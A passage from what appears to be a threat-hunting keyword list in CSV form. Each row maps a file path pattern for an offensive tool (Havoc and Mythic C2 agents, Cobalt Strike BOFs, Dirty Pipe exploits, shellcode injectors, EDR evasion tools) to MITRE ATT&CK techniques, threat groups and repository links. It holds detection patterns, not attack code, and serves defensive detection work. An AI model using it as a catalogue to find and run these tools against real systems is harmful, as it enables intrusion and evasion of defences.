T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/demon.x64.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/demon1.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/demosyscalls.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Dendrobate.git*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*/Dendron.bin*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*/Dendron.csproj*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*/Dendron.exe*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*/Dendron.sln*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*/Dent/*/Loader/Loader.go*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" +"*/Dent/Dent.go*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" +"*/Dent/Loader*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" +"*/DesertFox/archive/*.zip*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" +"*/detail/kali-linux/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/detect_antivirus/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/detect_antivirus/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/detect-hooks.c*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" +"*/detect-hooks.cna*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" +"*/detect-hooks.h*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" +"*/Detect-Hooks/*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" +"*/DFSCoerce.git*","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","635","78","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" +"*/dfscoerce.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/dhcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Dialogs/Payload.hpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/dicom-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dicom-ping.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dict-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dicts/ftp_default.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*/DInjector.git*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,, +"*/DInvoke/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/DInvokeResolver/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*/dir_brute.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/dirbuster*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/dirbuster/*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/DirCreate2System.git*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" +"*/direct_syscall_amd64.s*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" +"*/dirsearch.py*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*/Dirty-Pipe.sh*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/imfiver/CVE-2022-0847","1","1","N/A","N/A","3","257","74","2023-02-02T02:17:30Z","2022-03-07T18:36:50Z" +"*/Dirty-Pipe.sh*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","1","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" +"*/Dirty-Pipe/main/exploit-static*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" +"*/dirtypipez.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/dirtypipez.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","1","41","21","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" +"*/dirtypipez.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","1","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" +"*/dirtypipez-exploit/*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","1","41","21","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" +"*/disctopia.py*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" +"*/disctopia-c2*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" +"*/DiskCryptor.git*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*/dist/fw_walk.*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" +"*/distcc-cve2004-2687.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/distopia-test*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","0","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" +"*/dll/inject/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/dllexploit.cpp*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" 